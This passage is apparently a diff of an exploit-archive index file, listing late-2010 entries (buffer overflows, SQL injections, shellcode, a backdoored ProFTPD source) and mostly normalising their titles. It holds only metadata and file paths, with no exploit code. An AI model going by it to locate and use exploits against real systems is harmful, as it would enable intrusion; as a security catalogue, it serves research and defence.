Provencher",linux,dos,0 15464,platforms/linux/dos/15464.txt,"Novell Groupwise Internet Agent IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0 15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL injection Exploit",2010-11-09,"Easy Laster",php,webapps,0 -15466,platforms/php/webapps/15466.txt,"Joomla Component JQuarks4s 1.0.0 Blind SQL Injection Vulnerability",2010-11-09,"Salvatore Fresta",php,webapps,0 +15466,platforms/php/webapps/15466.txt,"Joomla Component JQuarks4s 1.0.0 - Blind SQL Injection Vulnerability",2010-11-09,"Salvatore Fresta",php,webapps,0 15467,platforms/multiple/dos/15467.txt,"Oracle MySQL < 5.1.49 'WITH ROLLUP' Denial Of Service Vulnerability",2010-11-09,"Shane Bester",multiple,dos,0 15468,platforms/php/webapps/15468.txt,"Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0 15469,platforms/php/webapps/15469.txt,"Joomla Component (com_markt) SQL Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0 @@ -13438,7 +13436,7 @@ id,file,description,date,author,platform,type,port 15491,platforms/osx/dos/15491.txt,"Apple Directory Services Memory Corruption",2010-11-11,"Rodrigo Rubira",osx,dos,0 15492,platforms/php/webapps/15492.php,"E-Xoopport 3.1 - eCal display.php (katid) SQL Injection Exploit",2010-11-11,"Vis Intelligendi",php,webapps,0 15493,platforms/windows/dos/15493.py,"Visual MP3 Splitter & Joiner 6.1 (.wav) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 -15494,platforms/windows/dos/15494.pl,"VbsEdit v 4.7.2.0 (.vbs) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 +15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - (.vbs) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - (.cda) Denial of Service Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0 15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0 15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 newsroom.asp SQL Injection Vulnerability",2010-11-12,Daikin,asp,webapps,0 @@ -13447,7 +13445,7 @@ id,file,description,date,author,platform,type,port 15500,platforms/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 File Disclosure Vulnerability",2010-11-12,sfx,php,webapps,0 15501,platforms/php/webapps/15501.txt,"Joomla Component com_jsupport Critical XSS Vulnerability",2010-11-12,Valentin,php,webapps,0 15502,platforms/php/webapps/15502.txt,"Joomla Component com_jsupport SQL Injection Vulnerability",2010-11-12,Valentin,php,webapps,0 -15504,platforms/hardware/dos/15504.txt,"Camtron CMNC-200 IP Camera ActiveX Buffer Overflow Vulnerability",2010-11-13,"Trustwave's SpiderLabs",hardware,dos,0 +15504,platforms/hardware/dos/15504.txt,"Camtron CMNC-200 IP Camera ActiveX Buffer Overflow Vulnerability",2010-11-13,"Trustwave's SpiderLabs",hardware,dos,0 15505,platforms/hardware/remote/15505.txt,"Camtron CMNC-200 IP Camera Directory Traversal Vulnerability",2010-11-13,"Trustwave's SpiderLabs",hardware,remote,0 15506,platforms/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 15507,platforms/hardware/webapps/15507.txt,"Camtron CMNC-200 IP Camera Undocumented Default Accounts",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 @@ -13483,7 +13481,7 @@ id,file,description,date,author,platform,type,port 15555,platforms/php/webapps/15555.txt,"Joomla Maian Media Component (com_maianmedia) SQL Injection Vulnerability",2010-11-16,v3n0m,php,webapps,0 15557,platforms/php/webapps/15557.txt,"openEngine 2.0 100226 LFI and XSS Vulnerabilities",2010-11-16,"SecPod Research",php,webapps,0 15558,platforms/multiple/dos/15558.html,"Safari 5.02 Stack Overflow Denial of Service",2010-11-16,clshack,multiple,dos,0 -15559,platforms/php/webapps/15559.txt,"IceBB 1.0-rc10 Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0 +15559,platforms/php/webapps/15559.txt,"IceBB 1.0-rc10 - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0 15560,platforms/php/webapps/15560.txt,"CLANSPHERE 2010.0 Final Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0 15561,platforms/php/webapps/15561.txt,"CompactCMS 1.4.1 SQL Injection Vulnerability",2010-11-16,"High-Tech Bridge SA",php,webapps,0 15563,platforms/asp/webapps/15563.txt,"Sitefinity CMS (ASP.NET) Shell Upload Vulnerability",2010-11-17,Net.Edit0r,asp,webapps,0 @@ -13494,8 +13492,8 @@ id,file,description,date,author,platform,type,port 15568,platforms/php/webapps/15568.py,"chCounter <= 3.1.3 SQL Injection Vulnerability",2010-11-18,"Matias Fontanini",php,webapps,0 15569,platforms/windows/local/15569.rb,"MP3-Nator Buffer Overflow (SEH - DEP BYPASS)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0 15570,platforms/php/webapps/15570.php,"Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF",2010-11-18,jdc,php,webapps,0 -15571,platforms/php/webapps/15571.txt,"FozzCom shopping<= 7.94+8.04 Multiple Remote Vulnerabilities",2010-11-18,"Dr.0rYX and Cr3w-DZ",php,webapps,0 -15572,platforms/php/webapps/15572.txt,"ViArt SHOP 4.0.5 Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0 +15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 Multiple Vulnerabilities",2010-11-18,"Dr.0rYX and Cr3w-DZ",php,webapps,0 +15572,platforms/php/webapps/15572.txt,"viart shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0 15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 CSRF Vulnerability",2010-11-19,Or4nG.M4N,php,webapps,0 15574,platforms/php/webapps/15574.txt,"Arabian Youtube Script Blind SQL Injection Vulnerability",2010-11-19,R3d-D3v!L,php,webapps,0 15575,platforms/windows/local/15575.py,"Minishare 1.5.5 BoF Vulnerability (users.txt) - EggHunter -",2010-11-19,0v3r,windows,local,0 @@ -13507,15 +13505,15 @@ id,file,description,date,author,platform,type,port 15583,platforms/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 KSD File Handling Use-After-Free Vulnerability",2010-11-20,LiquidWorm,windows,dos,0 15584,platforms/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 Local Privilege Escalation Vulnerability",2010-11-20,LiquidWorm,windows,local,0 15585,platforms/php/webapps/15585.txt,"Joomla Component (com_jimtawl) Local File Inclusion Vulnerability",2010-11-20,Mask_magicianz,php,webapps,0 -15588,platforms/php/webapps/15588.txt,"S-CMS 2.5 Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0 +15588,platforms/php/webapps/15588.txt,"s-cms 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0 15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler Privilege Escalation 0day",2010-11-20,webDEViL,windows,local,0 15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 XSS Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0 -15592,platforms/php/webapps/15592.txt,"Sahitya Graphics CMS Multiple Remote Vulnerabilities",2010-11-21,"Dr.0rYX and Cr3w-DZ",php,webapps,0 +15592,platforms/php/webapps/15592.txt,"sahitya graphics cms Multiple Vulnerabilities",2010-11-21,"Dr.0rYX and Cr3w-DZ",php,webapps,0 15593,platforms/php/webapps/15593.html,"Cpanel 11.X Edit E-mail Cross Site Request Forgery exploit",2010-11-21,"Mon7rF .",php,webapps,0 15594,platforms/php/webapps/15594.txt,"AuraCMS (pfd.php) SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0 15595,platforms/php/webapps/15595.txt,"jSchool Advanced Blind SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0 15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 file download vulnerability",2010-11-22,Beach,jsp,webapps,0 -15597,platforms/asp/webapps/15597.txt,"Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability",2010-11-22,Net.Edit0r,asp,webapps,0 +15597,platforms/asp/webapps/15597.txt,"Acidcat CMS 3.3 - (fckeditor) Shell Upload Vulnerability",2010-11-22,Net.Edit0r,asp,webapps,0 15598,platforms/windows/dos/15598.pl,"Xion Audio Player 1.0.126 (.m3u8) Buffer Overflow Vulnerability",2010-11-23,anT!-Tr0J4n,windows,dos,0 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability",2010-11-23,0v3r,windows,local,0 15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0 @@ -13531,16 +13529,16 @@ id,file,description,date,author,platform,type,port 15612,platforms/php/webapps/15612.txt,"SiteEngine <= 7.1 SQL Injection Vulnerability",2010-11-25,Beach,php,webapps,0 15613,platforms/windows/dos/15613.py,"NCH Officeintercom <= 5.20 - Remote Denial of Service Vulnerability",2010-11-25,"xsploited security",windows,dos,0 15614,platforms/php/webapps/15614.html,"Wolf CMS 0.6.0b Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 -15615,platforms/php/webapps/15615.html,"Frog CMS 0.9.5 Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 +15615,platforms/php/webapps/15615.html,"frog cms 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - add root user with password - 151 bytes",2010-11-25,"Jonathan Salwan",arm,shellcode,0 -15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server Directory Traversal",2010-11-25,clshack,multiple,remote,0 +15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0 15618,platforms/osx/shellcode/15618.c,"OSX/Intel - setuid shell x86_64 - 51 bytes",2010-11-25,"Dustin Schultz",osx,shellcode,0 15619,platforms/linux/dos/15619.c,"Linux Kernel 'setup_arg_pages()' Denial of Service Vulnerability",2010-11-26,"Roland McGrath",linux,dos,0 15620,platforms/linux/local/15620.sh,"systemtap - Local Root Privilege Escalation Vulnerability",2010-11-26,"Tavis Ormandy",linux,local,0 15621,platforms/php/webapps/15621.txt,"Jurpopage 0.2.0 SQL Injection",2010-11-27,Sudden_death,php,webapps,0 15622,platforms/linux/dos/15622.c,"Linux Kernel Unix Sockets Local Denial of Service",2010-11-27,"Key Night",linux,dos,0 15623,platforms/php/webapps/15623.pl,"MemHT Portal 4.0.1 [user agent] Persistent Cross Site Scripting",2010-11-27,ZonTa,php,webapps,0 -15624,platforms/windows/local/15624.txt,"CA Internet Security Suite 2010 KmxSbx.sys Kernel Pool Overflow 0 day Exploit",2010-11-28,"Nikita Tarakanov",windows,local,0 +15624,platforms/windows/local/15624.txt,"CA Internet Security Suite 2010 - KmxSbx.sys Kernel Pool Overflow (0day)",2010-11-28,"Nikita Tarakanov",windows,local,0 15625,platforms/cgi/webapps/15625.txt,"Skeletonz CMS Permanent XSS Vulnerability",2010-11-28,Jbyte,cgi,webapps,0 15626,platforms/windows/local/15626.py,"OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH)",2010-11-28,0v3r,windows,local,0 15627,platforms/asp/webapps/15627.html,"Site2Nite Big Truck Broker ""txtSiteId"" SQL Injection Vulnerability",2010-11-28,underground-stockholm.com,asp,webapps,0 @@ -13557,24 +13555,24 @@ id,file,description,date,author,platform,type,port 15639,platforms/php/webapps/15639.txt,"Pandora FMS <= 3.1 Authentication Bypass",2010-11-30,"Juan Galiana Lara",php,webapps,0 15640,platforms/php/webapps/15640.txt,"Pandora FMS <= 3.1 OS Command Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 15641,platforms/php/webapps/15641.txt,"Pandora FMS <= 3.1 SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 -15642,platforms/php/webapps/15642.txt,"Pandora FMS <= 3.1 Blind SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15642,platforms/php/webapps/15642.txt,"Pandora FMS <= 3.1 - Blind SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 15643,platforms/php/webapps/15643.txt,"Pandora FMS <= 3.1 Path Traversal and LFI",2010-11-30,"Juan Galiana Lara",php,webapps,0 15644,platforms/php/webapps/15644.txt,"Eclime 1.1.2b Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 -15645,platforms/php/webapps/15645.txt,"Enano CMS 1.1.7pl1 Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 -15646,platforms/php/webapps/15646.txt,"DynPG 4.2.0 Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 +15645,platforms/php/webapps/15645.txt,"enano cms 1.1.7pl1 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 +15646,platforms/php/webapps/15646.txt,"DynPG 4.2.0 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15647,platforms/php/webapps/15647.txt,"Elxis CMS 2009.2 SQL Injection Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15648,platforms/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution Exploit",2010-12-01,bz1p,windows,remote,0 15649,platforms/windows/dos/15649.pl,"HP Data Protector Manager A.06.11 MMD NULL Pointer Dereference Denial of Service",2010-12-01,Pepelux,windows,dos,0 15650,platforms/php/webapps/15650.txt,"Alibaba Clone B2B 3.4 SQL Injection Vulnerability",2010-12-01,"Dr.0rYX and Cr3w-DZ",php,webapps,0 15651,platforms/php/webapps/15651.txt,"OsCSS 1.2 Arbitrary File Upload Vulnerability",2010-12-01,"Shichemt Alen",php,webapps,0 -15653,platforms/asp/webapps/15653.txt,"BugTracker.Net 3.4.4 Multiple Vulnerabilities",2010-12-01,"Core Security",asp,webapps,0 -15654,platforms/php/webapps/15654.txt,"Digitalus 1.10.0 Alpha2 Arbitrary File Upload Vulnerability",2010-12-01,eidelweiss,php,webapps,0 +15653,platforms/asp/webapps/15653.txt,"bugtracker.net 3.4.4 - Multiple Vulnerabilities",2010-12-01,"Core Security",asp,webapps,0 +15654,platforms/php/webapps/15654.txt,"Digitalus 1.10.0 Alpha2 - Arbitrary File Upload Vulnerability",2010-12-01,eidelweiss,php,webapps,0 15655,platforms/windows/remote/15655.html,"J-Integra 2.11 - ActiveX SetIdentity() Buffer Overflow Exploit",2010-12-01,Dr_IDE,windows,remote,0 15656,platforms/php/webapps/15656.txt,"LittlePhpGallery 1.0.2 Local File Inclusion",2010-12-01,"kire bozorge khavarmian",php,webapps,0 15657,platforms/windows/dos/15657.txt,"FreeTrim MP3 2.2.3 Denial of Service Vulnerability",2010-12-02,h1ch4m,windows,dos,0 15658,platforms/windows/remote/15658.rb,"Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (msf)",2010-12-02,bz1p,windows,remote,0 15659,platforms/php/webapps/15659.txt,"Contenido CMS 4.8.12 XSS Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 -15660,platforms/php/webapps/15660.txt,"Etomite 1.1 Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 +15660,platforms/php/webapps/15660.txt,"etomite 1.1 - Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 (list.asp) Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0 15662,platforms/linux/remote/15662.txt,"ProFTPD 1.3.3c compromised source remote root Trojan",2010-12-02,anonymous,linux,remote,21 15663,platforms/windows/local/15663.py,"MediaCoder <= 0.7.5.4797 .m3u Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0 @@ -13603,7 +13601,7 @@ id,file,description,date,author,platform,type,port 15688,platforms/asp/webapps/15688.txt,"HotWebScripts HotWeb Rentals (resorts.asp) SQL injection",2010-12-05,R4dc0re,asp,webapps,0 15689,platforms/windows/remote/15689.py,"Freefloat FTP Server Buffer Overflow Vulnerability 0day",2010-12-05,0v3r,windows,remote,0 15690,platforms/asp/webapps/15690.txt,"SOOP Portal 2.0 Remote Upload Shell Vulnerability",2010-12-05,Net.Edit0r,asp,webapps,0 -15691,platforms/php/webapps/15691.txt,"'Pulse CMS Basic' Local File Inclusion Vulnerability",2010-12-05,"Mark Stanislav",php,webapps,0 +15691,platforms/php/webapps/15691.txt,"Pulse CMS Basic - Local File Inclusion Vulnerability",2010-12-05,"Mark Stanislav",php,webapps,0 15692,platforms/windows/local/15692.py,"Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0 15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit",2010-12-06,Rew,windows,local,0 15694,platforms/windows/dos/15694.txt,"Winzip 15.0 WZFLDVW.OCX Text Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos,0 @@ -13628,9 +13626,9 @@ id,file,description,date,author,platform,type,port 15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA SQL INJECTION",2010-12-09,Br0ly,php,webapps,0 15719,platforms/php/webapps/15719.txt,"JE Messenger 1.0 Arbitrary File Upload Vulnerability",2010-12-09,"Salvatore Fresta",php,webapps,0 15720,platforms/php/webapps/15720.txt,"Sulata iSoft (stream.php) Local File Disclosure Exploit",2010-12-10,Sudden_death,php,webapps,0 -15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 Blind SQL Injection",2010-12-10,jdc,php,webapps,0 +15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0 15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0 -15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 w/ PHP - Remote Exploit",2010-12-10,Kingcope,freebsd,remote,0 +15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,Kingcope,freebsd,remote,0 15725,platforms/linux/remote/15725.pl,"Exim 4.63 Remote Root Exploit",2010-12-11,Kingcope,linux,remote,0 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 .m3u Buffer Overflow",2010-12-11,zota,windows,local,0 15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot CSRF Vulnerabilities",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0 @@ -13645,7 +13643,7 @@ id,file,description,date,author,platform,type,port 15739,platforms/windows/dos/15739.pl,"Easy DVD Creator Local Crash PoC",2010-12-15,h1ch4m,windows,dos,0 15740,platforms/php/webapps/15740.txt,"Pointter PHP Content Management System Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",php,webapps,0 15741,platforms/php/webapps/15741.txt,"Pointter PHP Micro-Blogging Social Network Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",php,webapps,0 -15742,platforms/php/webapps/15742.txt,"BEdita 3.0.1.2550 Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 +15742,platforms/php/webapps/15742.txt,"BEdita 3.0.1.2550 - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 15743,platforms/php/webapps/15743.txt,"BLOG:CMS <= 4.2.1e - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 15744,platforms/cgi/webapps/15744.txt,"Gitweb <= 1.7.3.3 - Cross Site Scripting",2010-12-15,emgent,cgi,webapps,80 15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) Local Root",2010-12-15,"Kryptos Logic",linux,local,0 @@ -13656,7 +13654,7 @@ id,file,description,date,author,platform,type,port 15750,platforms/windows/dos/15750.py,"SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability",2010-12-16,modpr0be,windows,dos,0 15751,platforms/windows/local/15751.pl,"Altarsoft Audio Converter 1.1 Buffer Overflow Exploit (SEH)",2010-12-16,"C4SS!0 G0M3S",windows,local,0 15752,platforms/php/webapps/15752.txt,"Softbiz PHP Joke Site Software Multiple SQL Injection Vulnerabilities",2010-12-17,v3n0m,php,webapps,0 -15753,platforms/hardware/webapps/15753.html,"D-Link DIR-300 CSRF Vuln (Change Admin Account Settings)",2010-12-17,outlaw.dll,hardware,webapps,0 +15753,platforms/hardware/webapps/15753.html,"D-Link DIR-300 - CSRF Vulnerability (Change Admin Account Settings)",2010-12-17,outlaw.dll,hardware,webapps,0 15754,platforms/php/webapps/15754.txt,"Immo Makler Script SQL Injection Vulnerability",2010-12-17,"Easy Laster",php,webapps,0 15755,platforms/php/webapps/15755.txt,"Easy Online Shop SQL Injection Vulnerability",2010-12-17,"Easy Laster",php,webapps,0 15756,platforms/php/webapps/15756.txt,"MHP Downloadshop SQL Injection Vulnerability",2010-12-17,"Easy Laster",php,webapps,0 @@ -13665,7 +13663,7 @@ id,file,description,date,author,platform,type,port 15762,platforms/windows/local/15762.txt,"NProtect Anti-Virus 2007 <= 2010.5.11.1 - Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 15763,platforms/windows/local/15763.txt,"ESTsoft ALYac Anti-Virus 1.5 <= 5.0.1.2 - Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 15764,platforms/windows/local/15764.txt,"ViRobot Desktop 5.5 and Server 3.5 <= 2008.8.1.1 - Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 -15765,platforms/php/webapps/15765.txt,"CubeCart v 3.x Remote File Upload Vulnerability",2010-12-17,StunTMaN!,php,webapps,0 +15765,platforms/php/webapps/15765.txt,"CubeCart 3.x - Remote File Upload Vulnerability",2010-12-17,StunTMaN!,php,webapps,0 15766,platforms/php/webapps/15766.txt,"Radius Manager 3.8.0 Multiple XSS Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0 15767,platforms/windows/dos/15767.py,"Ecava IntegraXor Remote ActiveX Buffer Overflow PoC",2010-12-18,"Jeremy Brown",windows,dos,0 15768,platforms/php/webapps/15768.txt,"MCFileManager Plugin for TinyMCE 3.2.2.3 Arbitrary File Upload Vulnerability",2010-12-18,"Vladimir Vorontsov",php,webapps,0 @@ -13700,9 +13698,9 @@ id,file,description,date,author,platform,type,port 15799,platforms/php/webapps/15799.txt,"Habari Blog Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 15800,platforms/php/webapps/15800.txt,"html-edit CMS Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 15801,platforms/php/webapps/15801.txt,"Joomla Component com_xgallery 1.0 Local File Inclusion Vulnerability",2010-12-21,KelvinX,php,webapps,0 -15802,platforms/windows/remote/15802.txt,"Ecava IntegraXor 3.6.4000.0 Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote,0 +15802,platforms/windows/remote/15802.txt,"ecava integraxor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote,0 15803,platforms/windows/dos/15803.py,"Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC",2010-12-21,"Matthew Bergin",windows,dos,0 -15804,platforms/php/webapps/15804.txt,"JobAppr <= 1.4 Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps,0 +15804,platforms/php/webapps/15804.txt,"jobappr <= 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps,0 15805,platforms/hardware/dos/15805.php,"Apple iPhone Safari (JS .) Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos,0 15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway Command Injection Vulnerability",2010-12-22,"George D. Gal",linux,remote,0 15807,platforms/cgi/webapps/15807.txt,"Mitel AWC Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps,0 @@ -13720,8 +13718,8 @@ id,file,description,date,author,platform,type,port 15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 (post.php) SQL Injection Vulnerability",2010-12-24,cOndemned,php,webapps,0 15821,platforms/windows/dos/15821.py,"HttpBlitz Web Server Denial Of Service Exploit",2010-12-24,otoy,windows,dos,0 15822,platforms/php/webapps/15822.html,"CubeCart 3.0.6 - CSRF Vulnerability (Add Admin)",2010-12-24,"P0C T34M",php,webapps,0 -15824,platforms/php/webapps/15824.txt,"Pligg 1.1.2 Blind SQL Injection and XSS Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0 -15825,platforms/php/webapps/15825.txt,"OpenAuto 1.6.3 Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0 +15824,platforms/php/webapps/15824.txt,"Pligg 1.1.2 - Blind SQL Injection and XSS Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0 +15825,platforms/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0 15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 CSRF Vulnerability",2010-12-25,"P0C T34M",php,webapps,0 15827,platforms/php/webapps/15827.txt,"Joomla Component (com_idoblog) SQL Injection Vulnerability",2010-12-25,NOCKAR1111,php,webapps,0 15828,platforms/php/webapps/15828.txt,"Vacation Rental Script 4.0 - CSRF Vulnerability",2010-12-25,OnurTURKESHAN,php,webapps,0 @@ -13738,7 +13736,7 @@ id,file,description,date,author,platform,type,port 15842,platforms/hardware/remote/15842.txt,"DD-WRT Information Disclosure Vulnerability",2010-12-29,"Craig Heffner",hardware,remote,0 15843,platforms/php/webapps/15843.txt,"News Script PHP Pro (fckeditor) File Upload Vulnerability",2010-12-29,Net.Edit0r,php,webapps,0 15845,platforms/windows/dos/15845.py,"IrfanView 4.27 - JP2000.dll plugin DoS",2010-12-29,BraniX,windows,dos,0 -15846,platforms/php/webapps/15846.txt,"KaiBB 1.0.1 Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 +15846,platforms/php/webapps/15846.txt,"kaibb 1.0.1 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15847,platforms/php/webapps/15847.txt,"DzTube SQL Injection Vulnerability",2010-12-29,"errnick qwe",php,webapps,0 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection Vulnerability",2010-12-29,hiphop,php,webapps,0 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - CSRF Code Injection Vulnerability",2010-12-29,hiphop,php,webapps,0 @@ -13749,11 +13747,11 @@ id,file,description,date,author,platform,type,port 15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - (.pls) SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0 15856,platforms/php/webapps/15856.php,"TYPO3 Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0 -15858,platforms/php/webapps/15858.txt,"Wordpress 3.0.3 Stored XSS (IE7,6 NS8.1)",2010-12-29,Saif,php,webapps,0 +15858,platforms/php/webapps/15858.txt,"wordpress 3.0.3 - Stored XSS (ie7,6 ns8.1)",2010-12-29,Saif,php,webapps,0 15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service",2010-12-29,emgent,windows,dos,0 -15861,platforms/windows/remote/15861.txt,"httpdASM 0.92 Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 -15862,platforms/windows/remote/15862.txt,"QuickPHP Web Server 1.9.1 Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 -15863,platforms/php/webapps/15863.txt,"LightNEasy 3.2.2 Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 +15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 +15862,platforms/windows/remote/15862.txt,"quickphp web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 +15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15864,platforms/php/webapps/15864.txt,"Ignition 1.3 (page.php) Local File Inclusion Vulnerability",2010-12-30,cOndemned,php,webapps,0 15865,platforms/php/webapps/15865.php,"Ignition 1.3 Remote Code Execution Exploit",2010-12-30,cOndemned,php,webapps,0 15866,platforms/windows/remote/15866.html,"Chilkat Software FTP2 ActiveX Component Remote Code Execution",2010-12-30,rgod,windows,remote,0 @@ -13768,7 +13766,7 @@ id,file,description,date,author,platform,type,port 15890,platforms/php/webapps/15890.txt,"Tech Shop Technote 7 SQL Injection Vulnerability",2011-01-01,MaJ3stY,php,webapps,0 15891,platforms/php/webapps/15891.txt,"GALLARIFIC PHP Photo Gallery Script 